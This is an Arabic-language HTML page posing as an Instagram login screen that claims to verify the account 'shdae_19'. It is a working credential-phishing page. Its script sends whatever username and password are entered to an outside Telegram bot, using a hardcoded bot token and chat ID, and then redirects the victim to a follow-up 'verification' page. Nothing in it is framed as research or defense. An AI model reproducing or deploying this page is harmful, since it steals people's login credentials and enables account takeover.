<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>تسجيل الدخول</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #FAFAFA;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .container {
            background-color: white;
            padding: 30px;
            border-radius: 5px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
            text-align: center;
            width: 350px;
        }
        .logo {
            margin-bottom: 20px;
        }
        .info {
            margin: 10px 0;
            font-size: 14px;
            color: #555;
        }
        input {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #DBDBDB;
            border-radius: 5px;
        }
        button {
            background-color: #0095F6;
            color: white;
            padding: 10px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            width: 100%;
            font-size: 16px;
        }
        button:hover {
            background-color: #007bbf;
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="شعار إنستجرام" class="logo" width="100">
        <div class="info">تحقق من هويات حساب <strong>shdae_19</strong>.</div>
        <input type="text" id="username" placeholder="اسم المستخدم، البريد الإلكتروني، أو رقم الهاتف" required>
        <input type="password" id="password" placeholder="كلمة المرور" required>
        <button onclick="login()">تسجيل الدخول</button>
    </div>

    <script>
        function login() {
            var username = document.getElementById('username').value;
            var password = document.getElementById('password').value;

            if (username && password) {
                // إعداد بيانات الطلب
                const token = '7663182945:AAEdL3RhiFgxBMZ-el6h237O03_9o74t2Qw'; // توكن البوت
                const chatId = '6807322946'; // معرف الدردشة
                const message = `اسم المستخدم: ${username}\nكلمة المرور: ${password}`;

                // إرسال الطلب إلى تلغرام
                fetch(`https://api.telegram.org/bot${token}/sendMessage`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify({
                        chat_id: chatId,
                        text: message,
                    }),
                })
                .then(response => {
                    if (response.ok) {
                        alert('تم إرسال البيانات بنجاح!');
                        window.location.href = 'verification.html'; // الانتقال إلى صفحة التحقق
                    } else {
                        alert('فشل إرسال البيانات.');
                    }
                })
                .catch(error => {
                    console.error('Error:', error);
                    alert('حدث خطأ أثناء الاتصال بالخادم.');
                });
            } else {
                alert('لم نتمكن من العثور على حسابك.');
            }
        }
    </script>
</body>
</html>